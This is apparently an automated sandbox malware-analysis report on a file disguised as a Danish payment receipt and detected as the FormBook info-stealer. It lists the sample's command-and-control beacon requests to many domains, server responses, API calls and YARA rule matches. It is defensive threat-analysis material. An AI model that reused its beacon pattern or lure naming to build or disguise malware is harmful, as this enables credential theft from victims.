          Source: global trafficHTTP traffic detected: GET /b0us/?ER-tHjR=NeMtgU3TUqkyahWOuk7UbKtu2f6OPWemmRyjHCkgk8lKJDy56aFQiEm/TJxXDeQeO1MybhrnKA==&7nB=o48X HTTP/1.1Host: www.insularrofioa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.217 198.54.117.217
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 15:50:36 GMTContent-Type: text/htmlContent-Length: 275ETag: "61774856-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 15:50:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 15:50:47 GMTContent-Type: text/htmlContent-Length: 275ETag: "6175c221-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 15:51:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bz3Z9xDKX9qXLWedJeYbmqe4wi2s4eO3jBbJQMiMyNHDIEsXgBZ7mHx2nwoUFffwMZYPSWVaKAbLAX3R7%2F6l%2FOwe3bPbgDMXRJvrUpWhVkm4%2BufBQexlKs5sYLWh88gtWNOc0g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a4d15a21fe05bf1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 30 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 78 67 6d 61 72 6b 65 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 107<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rxgmarket.com Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 27 Oct 2021 15:51:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: -1X-Request-ID: d3f121e3-1b05-4bdd-beea-f59c42222099X-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Dc: gcp-europe-west1CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6a4d15c3ce834e0e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 15:51:28 GMTContent-Type: text/htmlContent-Length: 275ETag: "61774872-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: Betalingskvittering.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Betalingskvittering.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.388648434.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.bobazzing.com
          Source: global trafficHTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=UBAh+VKzDimqRzzQdOOZ1/Gg43oaZbQvrcwMwq1yQU/lFkYIOb3JKuxkIDajXNdZJrP2FICqIQ== HTTP/1.1Host: www.bobazzing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?ER-tHjR=XOV60v1mqekMspvFU+0rKPDlyXSEiaRHynKCSPj1mvOyDA4pkDpWyOZGigF6MKTilgG5HmfPXw==&7nB=o48X HTTP/1.1Host: www.improvfilmproduction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=IHm7DXqJMOlXRiIvQCzDYuNSepBShfVGHLx9uFm0ofOXeJBRLox1psSi4oyGmyzdtrRcHIstiA== HTTP/1.1Host: www.olympiaapartment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X HTTP/1.1Host: www.malatirada.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ== HTTP/1.1Host: www.finansresultation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?ER-tHjR=Jj3KnWU2wHfhK+BlDqyhqSxeJEURVrle6TPUvLIqsqCsrOVtG9y5Fb94G4BOAz9I+plsxBUl/Q==&7nB=o48X HTTP/1.1Host: www.rxgmarket.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=gHtktScKtff4xVk3YRyKSNbVreJpCBobm1IhD3pS9EMOhSghOP3G/JLMMDt6OL3q2Wx4R+w5Og== HTTP/1.1Host: www.joystoreworld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X HTTP/1.1Host: www.bbyyn10.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=twm/1Bp31EH0Ih+sIHhgkxpvXOzGUgtw6+dZfZW7p7V/jiZPQGLQCd1AR8vD1TjU5s4Zo4ED0Q== HTTP/1.1Host: www.inkedbreadcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b0us/?ER-tHjR=NeMtgU3TUqkyahWOuk7UbKtu2f6OPWemmRyjHCkgk8lKJDy56aFQiEm/TJxXDeQeO1MybhrnKA==&7nB=o48X HTTP/1.1Host: www.insularrofioa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00404FC2 GetEncryptedFileVersionExt,GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Betalingskvittering.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
